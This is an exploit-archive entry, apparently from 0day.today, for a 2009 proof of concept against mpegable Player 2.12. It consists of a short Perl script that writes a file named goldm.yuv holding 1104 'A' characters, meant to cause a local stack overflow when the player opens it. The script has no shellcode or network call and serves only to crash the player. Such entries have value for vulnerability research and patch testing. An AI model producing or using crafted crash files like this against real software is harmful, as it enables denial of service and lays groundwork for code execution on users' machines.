id: 6837
date: 04/28/2009
title: mpegable Player 2.12 (YUV File) Local Stack Overflow PoC
author: GoLd_M
cves: 

========================================================
mpegable Player 2.12 (YUV File) Local Stack Overflow PoC
========================================================


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### ###
# #  mpegable Player 2.12 (YUV File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ##
my $chars= "A" x 1104;
my $file="goldm.yuv";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";



#  0day.today [2023-03-23]  #